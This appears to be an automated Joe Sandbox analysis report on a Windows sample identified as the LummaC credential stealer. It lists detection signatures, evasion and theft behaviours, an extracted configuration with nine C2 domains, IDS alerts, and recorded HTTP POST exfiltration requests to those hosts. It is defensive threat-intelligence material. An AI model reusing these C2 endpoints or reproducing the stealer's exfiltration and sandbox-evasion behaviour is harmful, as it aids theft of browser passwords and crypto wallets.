Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
random.exe

Overview

General Information

Sample name:random.exe
Analysis ID:1654467
MD5:7ddd1b8a415abf939fff535a63d55852
SHA1:002af611d08da05678b2ffa2e71f35301c686d39
SHA256:1afecee6b536d098ca5d3a7d594b200f7a2126349de4cad9ff0be2b78dba9e68
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • random.exe (PID: 6208 cmdline: "C:\Users\user\Desktop\random.exe" MD5: 7DDD1B8A415ABF939FFF535A63D55852)
  • cleanup

Malware Configuration

Threatname: LummaC

{
  "C2 url": [
    "rodformi.run/aUosoz",
    "metalsyo.digital/opsa",
    "ironloxp.live/aksdd",
    "navstarx.shop/FoaJSi",
    "starcloc.bet/GOksAo",
    "advennture.top/GKsiio",
    "targett.top/dsANGt",
    "spacedbv.world/EKdlsk",
    "galxnetb.today/GsuIAo"
  ],
  "Build id": "60b9f9e5476e5addebd35ee78319344820c942678dcba3c8310f9777"
}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
    00000000.00000003.1046421738.0000000005400000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-04-02T11:33:22.423321+020020283713Unknown Traffic192.168.2.1049681172.67.197.67443TCP
      2025-04-02T11:33:24.103861+020020283713Unknown Traffic192.168.2.1049682172.67.197.67443TCP
      2025-04-02T11:33:25.611142+020020283713Unknown Traffic192.168.2.1049683172.67.197.67443TCP
      2025-04-02T11:33:26.746905+020020283713Unknown Traffic192.168.2.1049684172.67.197.67443TCP
      2025-04-02T11:33:28.649049+020020283713Unknown Traffic192.168.2.1049685172.67.197.67443TCP
      2025-04-02T11:33:29.859098+020020283713Unknown Traffic192.168.2.1049686172.67.197.67443TCP
      2025-04-02T11:33:31.717847+020020283713Unknown Traffic192.168.2.1049687172.67.197.67443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-04-02T11:33:22.423321+020020612141Domain Observed Used for C2 Detected192.168.2.1049681172.67.197.67443TCP
      2025-04-02T11:33:24.103861+020020612141Domain Observed Used for C2 Detected192.168.2.1049682172.67.197.67443TCP
      2025-04-02T11:33:25.611142+020020612141Domain Observed Used for C2 Detected192.168.2.1049683172.67.197.67443TCP
      2025-04-02T11:33:26.746905+020020612141Domain Observed Used for C2 Detected192.168.2.1049684172.67.197.67443TCP
      2025-04-02T11:33:28.649049+020020612141Domain Observed Used for C2 Detected192.168.2.1049685172.67.197.67443TCP
      2025-04-02T11:33:29.859098+020020612141Domain Observed Used for C2 Detected192.168.2.1049686172.67.197.67443TCP
      2025-04-02T11:33:31.717847+020020612141Domain Observed Used for C2 Detected192.168.2.1049687172.67.197.67443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-04-02T11:33:22.078124+020020612131Domain Observed Used for C2 Detected192.168.2.10615531.1.1.153UDP

      Joe Sandbox Signatures

      • AV Detection
      • Compliance
      • Networking
      • System Summary
      • Data Obfuscation
      • Boot Survival
      • Hooking and other Techniques for Hiding and Protection
      • Malware Analysis System Evasion
      • Anti Debugging
      • HIPS / PFW / Operating System Protection Evasion
      • Language, Device and Operating System Detection
      • Lowering of HIPS / PFW / Operating System Security Settings
      • Stealing of Sensitive Information
      • Remote Access Functionality

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: random.exeAvira: detected
      Source: https://rodformi.run/aUosozcAvira URL Cloud: Label: malware
      Source: https://rodformi.run:443/aUosozagesAvira URL Cloud: Label: malware
      Source: https://rodformi.run/cVAvira URL Cloud: Label: malware
      Source: https://rodformi.run/4Avira URL Cloud: Label: malware
      Source: https://rodformi.run/dAvira URL Cloud: Label: malware
      Source: https://rodformi.run:443/aUosozAvira URL Cloud: Label: malware
      Source: https://rodformi.run/1Avira URL Cloud: Label: malware
      Source: https://rodformi.run:443/aUosozcAvira URL Cloud: Label: malware
      Source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["rodformi.run/aUosoz", "metalsyo.digital/opsa", "ironloxp.live/aksdd", "navstarx.shop/FoaJSi", "starcloc.bet/GOksAo", "advennture.top/GKsiio", "targett.top/dsANGt", "spacedbv.world/EKdlsk", "galxnetb.today/GsuIAo"], "Build id": "60b9f9e5476e5addebd35ee78319344820c942678dcba3c8310f9777"}
      Source: random.exeVirustotal: Detection: 60%Perma Link
      Source: random.exeReversingLabs: Detection: 69%
      Source: Submited SampleNeural Call Log Analysis: 81.3%
      Source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmpString decryptor: rodformi.run/aUosoz
      Source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmpString decryptor: metalsyo.digital/opsa
      Source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmpString decryptor: ironloxp.live/aksdd
      Source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmpString decryptor: navstarx.shop/FoaJSi
      Source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmpString decryptor: starcloc.bet/GOksAo
      Source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmpString decryptor: advennture.top/GKsiio
      Source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmpString decryptor: targett.top/dsANGt
      Source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmpString decryptor: spacedbv.world/EKdlsk
      Source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmpString decryptor: galxnetb.today/GsuIAo
      Source: random.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49681 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49682 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49683 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49684 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49685 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49686 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49687 version: TLS 1.2

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2061213 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rodformi .run) : 192.168.2.10:61553 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2061214 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI : 192.168.2.10:49684 -> 172.67.197.67:443
      Source: Network trafficSuricata IDS: 2061214 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI : 192.168.2.10:49687 -> 172.67.197.67:443
      Source: Network trafficSuricata IDS: 2061214 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI : 192.168.2.10:49682 -> 172.67.197.67:443
      Source: Network trafficSuricata IDS: 2061214 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI : 192.168.2.10:49686 -> 172.67.197.67:443
      Source: Network trafficSuricata IDS: 2061214 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI : 192.168.2.10:49683 -> 172.67.197.67:443
      Source: Network trafficSuricata IDS: 2061214 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI : 192.168.2.10:49681 -> 172.67.197.67:443
      Source: Network trafficSuricata IDS: 2061214 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI : 192.168.2.10:49685 -> 172.67.197.67:443
      Source: Malware configuration extractorURLs: rodformi.run/aUosoz
      Source: Malware configuration extractorURLs: metalsyo.digital/opsa
      Source: Malware configuration extractorURLs: ironloxp.live/aksdd
      Source: Malware configuration extractorURLs: navstarx.shop/FoaJSi
      Source: Malware configuration extractorURLs: starcloc.bet/GOksAo
      Source: Malware configuration extractorURLs: advennture.top/GKsiio
      Source: Malware configuration extractorURLs: targett.top/dsANGt
      Source: Malware configuration extractorURLs: spacedbv.world/EKdlsk
      Source: Malware configuration extractorURLs: galxnetb.today/GsuIAo
      Source: Joe Sandbox ViewIP Address: 172.67.197.67 172.67.197.67
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49684 -> 172.67.197.67:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49687 -> 172.67.197.67:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49682 -> 172.67.197.67:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49686 -> 172.67.197.67:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49683 -> 172.67.197.67:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49681 -> 172.67.197.67:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49685 -> 172.67.197.67:443
      Source: global trafficHTTP traffic detected: POST /aUosoz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 65Host: rodformi.run
      Source: global trafficHTTP traffic detected: POST /aUosoz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MYI1hYv5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 14903Host: rodformi.run
      Source: global trafficHTTP traffic detected: POST /aUosoz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UG43df94ljvlU3YQzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 15075Host: rodformi.run
      Source: global trafficHTTP traffic detected: POST /aUosoz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MG2zEvW86fpUbh578xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 20444Host: rodformi.run
      Source: global trafficHTTP traffic detected: POST /aUosoz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6vE51zQQh0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 2556Host: rodformi.run
      Source: global trafficHTTP traffic detected: POST /aUosoz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=zKMWnlQnU1r08E6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 550482Host: rodformi.run
      Source: global trafficHTTP traffic detected: POST /aUosoz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 103Host: rodformi.run
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: rodformi.run
      Source: global trafficDNS traffic detected: DNS query: c.pki.goog
      Source: unknownHTTP traffic detected: POST /aUosoz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 65Host: rodformi.run
      Source: random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
      Source: random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
      Source: random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
      Source: random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
      Source: random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
      Source: random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
      Source: random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
      Source: random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
      Source: random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
      Source: random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
      Source: random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
      Source: random.exe, 00000000.00000003.1103094774.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700
      Source: random.exe, 00000000.00000003.1103094774.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta
      Source: random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
      Source: random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
      Source: random.exe, 00000000.00000003.1103094774.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
      Source: random.exe, 00000000.00000003.1103094774.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
      Source: random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
      Source: random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
      Source: random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
      Source: random.exe, random.exe, 00000000.00000003.1061957964.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1150577015.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1151808021.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1127961222.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144142121.00000000017D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rodformi.run/
      Source: random.exe, 00000000.00000003.1127961222.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144142121.00000000017D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rodformi.run/1
      Source: random.exe, 00000000.00000003.1127961222.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144142121.00000000017D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rodformi.run/4
      Source: random.exe, 00000000.00000003.1094165011.00000000017E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rodformi.run/aUosoz
      Source: random.exe, 00000000.00000003.1127961222.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144142121.00000000017D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rodformi.run/aUosozc
      Source: random.exe, 00000000.00000003.1127961222.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144142121.00000000017D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rodformi.run/cV
      Source: random.exe, 00000000.00000003.1150577015.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1151808021.00000000017D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rodformi.run/d
      Source: random.exe, 00000000.00000002.1151651944.0000000001744000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rodformi.run:443/aUosoz
      Source: random.exe, 00000000.00000003.1124307891.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144094054.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1150727353.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1151651944.0000000001744000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rodformi.run:443/aUosozages
      Source: random.exe, 00000000.00000003.1124307891.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144094054.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1112992476.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1150727353.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1151651944.0000000001744000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rodformi.run:443/aUosozc
      Source: random.exe, 00000000.00000003.1094204158.00000000060A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
      Source: random.exe, 00000000.00000003.1094204158.00000000060A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
      Source: random.exe, 00000000.00000003.1103094774.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64
      Source: random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
      Source: random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
      Source: random.exe, 00000000.00000003.1103094774.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr
      Source: random.exe, 00000000.00000003.1094204158.00000000060A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
      Source: random.exe, 00000000.00000003.1094204158.00000000060A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
      Source: random.exe, 00000000.00000003.1094204158.00000000060A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
      Source: random.exe, 00000000.00000003.1094204158.00000000060A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
      Source: random.exe, 00000000.00000003.1094204158.00000000060A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49681
      Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
      Source: unknownHTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49681 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49682 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49683 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49684 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49685 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49686 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.197.67:443 -> 192.168.2.10:49687 version: TLS 1.2

      System Summary

      barindex
      Source: random.exeStatic PE information: section name:
      Source: random.exeStatic PE information: section name: .idata
      Source: random.exeStatic PE information: section name:
      Source: random.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: random.exeStatic PE information: Section: ZLIB complexity 0.9984926970108695
      Source: random.exeStatic PE information: Section: zqekczog ZLIB complexity 0.994402600329957
      Source: random.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
      Source: random.exeBinary or memory string: .Vbp86
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@2/1
      Source: C:\Users\user\Desktop\random.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: random.exe, 00000000.00000003.1066090050.0000000005FBD000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1081673422.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1079634823.0000000005FB9000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1066382164.0000000005F85000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
      Source: random.exeVirustotal: Detection: 60%
      Source: random.exeReversingLabs: Detection: 69%
      Source: C:\Users\user\Desktop\random.exeFile read: C:\Users\user\Desktop\random.exeJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: fwpuclnt.dllJump to behavior
